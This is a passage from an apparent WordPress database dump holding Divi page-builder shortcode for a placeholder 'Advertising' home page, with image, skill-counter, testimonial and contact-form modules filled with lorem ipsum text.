custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 22:03:29','2020-07-04 22:03:29','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(188,1,'2020-07-04 22:04:50','2020-07-04 22:04:50','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" hover_enabled=\"0\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" 